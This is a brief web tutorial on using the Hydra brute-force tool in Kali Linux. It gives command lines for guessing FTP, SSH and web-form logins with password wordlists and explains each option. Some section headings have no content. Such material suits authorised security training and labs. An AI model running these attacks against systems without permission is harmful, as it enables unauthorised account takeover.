Hydra Bruteforce Kali Linux Tool - Tutorial 101

Hydra Bruteforce Kali Linux Tool – Tutorial 101

What is Hydra?

Installing Hydra

Hydra Commands

hydra -l user -P passlist.txt ftp://MACHINE_IP
hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh
OptionDescription
-lspecifies the (SSH) username for login
-Pindicates a list of passwords
-tsets the number of threads to spawn
hydra -l root -P passwords.txt MACHINE_IP -t 4 ssh 
  • Hydra will use root as the username for ssh
  • It will try the passwords in the passwords.txt file
  • There will be four threads running in parallel as indicated by -t 4
sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
OptionDescription
-lthe username for (web form) login
-Pthe password list to use
http-post-formthe type of the form is POST
<path>the login page URL, for example, login.php
<login_credentials>the username and password used to log in, for example, username=^USER^&password=^PASS^
<invalid_response>part of the response when the login fails
-Vverbose output for every attempt

Below is Best Example to Understand hydra tool.

hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V 
  • The login page is only /, i.e., the main IP address.
  • The username is the form field where the username is entered
  • The specified username(s) will replace ^USER^
  • The password is the form field where the password is entered
  • The provided passwords will be replacing ^PASS^
  • Finally, F=incorrect is a string that appears in the server reply when the login fails

Find More Article Like this on : https://technicalmeer.com

error: Content is protected !!